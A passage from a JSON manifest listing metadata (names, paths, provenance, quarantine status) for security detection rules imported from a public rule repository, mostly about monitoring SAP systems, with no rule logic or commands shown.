"provenance": { "source": "chronicle/detection-rules", "source_id": "sap_break_glass_account_login", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_break_glass_account_login.yaral" } }, { "id": "chronicle-detection-rules-sap-brute-force-rfc-logon", "type": "detection", "name": "sap_brute_force_rfc_logon", "description": "sap_brute_force_rfc_logon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-brute-force-rfc-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_brute_force_rfc_logon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_brute_force_rfc_logon.yaral" } }, { "id": "chronicle-detection-rules-sap-change-documents-sensitive-profile-assignment", "type": "detection", "name": "sap_change_documents_sensitive_profile_assignment", "description": "sap_change_documents_sensitive_profile_assignment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-change-documents-sensitive-profile-assignment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_change_documents_sensitive_profile_assignment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_change_documents_sensitive_profile_assignment.yaral" } }, { "id": "chronicle-detection-rules-sap-change-documents-sensitive-profile-assignment-data-table", "type": "detection", "name": "sap_change_documents_sensitive_profile_assignment_data_table", "description": "sap_change_documents_sensitive_profile_assignment_data_table", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-change-documents-sensitive-profile-assignment-data-table.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_change_documents_sensitive_profile_assignment_data_table", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_change_documents_sensitive_profile_assignment_data_table.yaral" } }, { "id": "chronicle-detection-rules-sap-change-documents-sensitive-role-assignment", "type": "detection", "name": "sap_change_documents_sensitive_role_assignment", "description": "sap_change_documents_sensitive_role_assignment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-change-documents-sensitive-role-assignment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_change_documents_sensitive_role_assignment", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_change_documents_sensitive_role_assignment.yaral" } }, { "id": "chronicle-detection-rules-sap-critial-role-assigned-to-new-user", "type": "detection", "name": "sap_critial_role_assigned_to_new_user", "description": "sap_critial_role_assigned_to_new_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-critial-role-assigned-to-new-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_critial_role_assigned_to_new_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_critial_role_assigned_to_new_user.yaral" } }, { "id": "chronicle-detection-rules-sap-critical-authorization-value-changed", "type": "detection", "name": "sap_critical_authorization_value_changed", "description": "sap_critical_authorization_value_changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-critical-authorization-value-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_critical_authorization_value_changed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_critical_authorization_value_changed.yaral" } }, { "id": "chronicle-detection-rules-sap-critical-role-assigned-to-new-user", "type": "detection", "name": "sap_critical_role_assigned_to_new_user", "description": "sap_critical_role_assigned_to_new_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-critical-role-assigned-to-new-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_critical_role_assigned_to_new_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_critical_role_assigned_to_new_user.yaral" } }, { "id": "chronicle-detection-rules-sap-data-changed-during-debugging", "type": "detection", "name": "sap_data_changed_during_debugging", "description": "sap_data_changed_during_debugging", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-data-changed-during-debugging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_data_changed_during_debugging", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_data_changed_during_debugging.yaral" } }, { "id": "chronicle-detection-rules-sap-deactivation-of-security-audit-log", "type": "detection", "name": "sap_deactivation_of_security_audit_log", "description": "sap_deactivation_of_security_audit_log", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-deactivation-of-security-audit-log.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_deactivation_of_security_audit_log", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_deactivation_of_security_audit_log.yaral" } }, { "id": "chronicle-detection-rules-sap-execution-of-sensitive-abap-program", "type": "detection", "name": "sap_execution_of_sensitive_abap_program", "description": "sap_execution_of_sensitive_abap_program", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-execution-of-sensitive-abap-program.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_execution_of_sensitive_abap_program", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_execution_of_sensitive_abap_program.yaral" } }, { "id": "chronicle-detection-rules-sap-function-module-testing-detected", "type": "detection", "name": "sap_function_module_testing_detected", "description": "sap_function_module_testing_detected", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-function-module-testing-detected.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_function_module_testing_detected", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_function_module_testing_detected.yaral" } }, { "id": "chronicle-detection-rules-sap-gateway-acl-bypass-attempt", "type": "detection", "name": "sap_gateway_acl_bypass_attempt", "description": "sap_gateway_acl_bypass_attempt", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-gateway-acl-bypass-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_gateway_acl_bypass_attempt", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_gateway_acl_bypass_attempt.yaral" } }, { "id": "chronicle-detection-rules-sap-gateway-ufo-table-access", "type": "detection", "name": "sap_gateway_ufo_table_access", "description": "sap_gateway_ufo_table_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-gateway-ufo-table-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_gateway_ufo_table_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_gateway_ufo_table_access.yaral" } }, { "id": "chronicle-detection-rules-sap-hanadb-assign-admin-authorizations", "type": "detection", "name": "sap_hanadb_assign_admin_authorizations", "description": "sap_hanadb_assign_admin_authorizations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-hanadb-assign-admin-authorizations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_hanadb_assign_admin_authorizations", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_hanadb_assign_admin_authorizations.yaral" } }, { "id": "chronicle-detection-rules-sap-hanadb-audit-trail-policy-changes", "type": "detection", "name": "sap_hanadb_audit_trail_policy_changes", "description": "sap_hanadb_audit_trail_policy_changes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-hanadb-audit-trail-policy-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_hanadb_audit_trail_policy_changes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_hanadb_audit_trail_policy_changes.yaral" } }, { "id": "chronicle-detection-rules-sap-hanadb-deactivation-of-audit-trail", "type": "detection", "name": "sap_hanadb_deactivation_of_audit_trail", "description": "sap_hanadb_deactivation_of_audit_trail", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-hanadb-deactivation-of-audit-trail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_hanadb_deactivation_of_audit_trail", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_hanadb_deactivation_of_audit_trail.yaral" } }, { "id": "chronicle-detection-rules-sap-hanadb-user-admin-actions", "type": "detection", "name": "sap_hanadb_user_admin_actions", "description": "sap_hanadb_user_admin_actions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-hanadb-user-admin-actions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_hanadb_user_admin_actions", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_hanadb_user_admin_actions.yaral" } }, { "id": "chronicle-detection-rules-sap-impossible-travel", "type": "detection", "name": "sap_impossible_travel", "description": "sap_impossible_travel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-impossible-travel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_impossible_travel", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_impossible_travel.yaral" } }, { "id": "chronicle-detection-rules-sap-multi-terminal-logon", "type": "detection", "name": "sap_multi_terminal_logon", "description": "sap_multi_terminal_logon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-multi-terminal-logon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_multi_terminal_logon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_multi_terminal_logon.yaral" } }, { "id": "chronicle-detection-rules-sap-multiple-password-changes", "type": "detection", "name": "sap_multiple_password_changes", "description": "sap_multiple_password_changes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-multiple-password-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_multiple_password_changes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_multiple_password_changes.yaral" } }, { "id": "chronicle-detection-rules-sap-netweaver-application-server-as-java-cve20206287-detection", "type": "detection", "name": "sap_netweaver_application_server_as_java_cve20206287_detection", "description": "sap_netweaver_application_server_as_java_cve20206287_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-netweaver-application-server-as-java-cve20206287-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_netweaver_application_server_as_java_cve20206287_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/sysmon/sap_netweaver_application_server__as__java_cve_2020_6287_detection.yaral" } }, { "id": "chronicle-detection-rules-sap-security-audit-log-configuration-change", "type": "detection", "name": "sap_security_audit_log_configuration_change", "description": "sap_security_audit_log_configuration_change", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-security-audit-log-configuration-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_security_audit_log_configuration_change", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_security_audit_log_configuration_change.yaral" } }, { "id": "chronicle-detection-rules-sap-security-audit-log-user-created-deleted-or-unlocked", "type": "detection", "name": "sap_security_audit_log_user_created_deleted_or_unlocked", "description": "sap_security_audit_log_user_created_deleted_or_unlocked", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-security-audit-log-user-created-deleted-or-unlocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_security_audit_log_user_created_deleted_or_unlocked", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_security_audit_log_user_created_deleted_or_unlocked.yaral" } }, { "id": "chronicle-detection-rules-sap-sensitive-rfc-function-module-execution", "type": "detection", "name": "sap_sensitive_rfc_function_module_execution", "description": "sap_sensitive_rfc_function_module_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-sensitive-rfc-function-module-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_sensitive_rfc_function_module_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_sensitive_rfc_function_module_execution.yaral" } }, { "id": "chronicle-detection-rules-sap-sensitive-role-assignment-correlation", "type": "detection", "name": "sap_sensitive_role_assignment_correlation", "description": "sap_sensitive_role_assignment_correlation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-sensitive-role-assignment-correlation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_sensitive_role_assignment_correlation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_sensitive_role_assignment_correlation.yaral" } }, { "id": "chronicle-detection-rules-sap-sensitive-role-authorization-modification", "type": "detection", "name": "sap_sensitive_role_authorization_modification", "description": "sap_sensitive_role_authorization_modification", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-sensitive-role-authorization-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_sensitive_role_authorization_modification", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_sensitive_role_authorization_modification.yaral" } }, { "id": "chronicle-detection-rules-sap-sensitive-tables-direct-access-by-rfc-logon-data-table", "type": "detection", "name": "sap_sensitive_tables_direct_access_by_rfc_logon_data_table", "description": "sap_sensitive_tables_direct_access_by_rfc_logon_data_table", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-sensitive-tables-direct-access-by-rfc-logon-data-table.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_sensitive_tables_direct_access_by_rfc_logon_data_table", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_sensitive_tables_direct_access_by_rfc_logon_data_table.yaral" } }, { "id": "chronicle-detection-rules-sap-sensitive-tables-direct-access-by-rfc-logon-static-list", "type": "detection", "name": "sap_sensitive_tables_direct_access_by_rfc_logon_static_list", "description": "sap_sensitive_tables_direct_access_by_rfc_logon_static_list", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-sensitive-tables-direct-access-by-rfc-logon-static-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_sensitive_tables_direct_access_by_rfc_logon_static_list", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_sensitive_tables_direct_access_by_rfc_logon_static_list.yaral" } }, { "id": "chronicle-detection-rules-sap-suspected-data-exfiltration", "type": "detection", "name": "sap_suspected_data_exfiltration", "description": "sap_suspected_data_exfiltration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-suspected-data-exfiltration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_suspected_data_exfiltration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_suspected_data_exfiltration.yaral" } }, { "id": "chronicle-detection-rules-sap-system-or-client-configuration-change", "type": "detection", "name": "sap_system_or_client_configuration_change", "description": "sap_system_or_client_configuration_change", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-system-or-client-configuration-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_system_or_client_configuration_change", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_system_or_client_configuration_change.yaral" } }, { "id": "chronicle-detection-rules-sap-user-creates-and-uses-new-user", "type": "detection", "name": "sap_user_creates_and_uses_new_user", "description": "sap_user_creates_and_uses_new_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/sap-user-creates-and-uses-new-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "sap_user_creates_and_uses_new_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/sap/sap_user_creates_and_uses_new_user.yaral" } }, { "id": "chronicle-detection-rules-scanner-poc-for-cve20190708-rdp-rce-vuln", "type": "detection", "name": "scanner_poc_for_cve20190708_rdp_rce_vuln", "description": "scanner_poc_for_cve20190708_rdp_rce_vuln", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/scanner-poc-for-cve20190708-rdp-rce-vuln.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "scanner_poc_for_cve20190708_rdp_rce_vuln", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/windows/scanner_poc_for_cve_2019_0708_rdp_rce_vuln.yaral" } }, { "id": "chronicle-detection-rules-scarab-ransomware", "type": "detection", "name": "scarab_ransomware", "description": "scarab_ransomware", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/scarab-ransomware.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "scarab_ransomware", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/scarab_ransomware_part_1.yaral" } }, { "id": "chronicle-detection-rules-scarab-ransomware-part-1", "type": "detection", "name": "scarab_ransomware_part_1", "description": "scarab_ransomware_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/scarab-ransomware-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 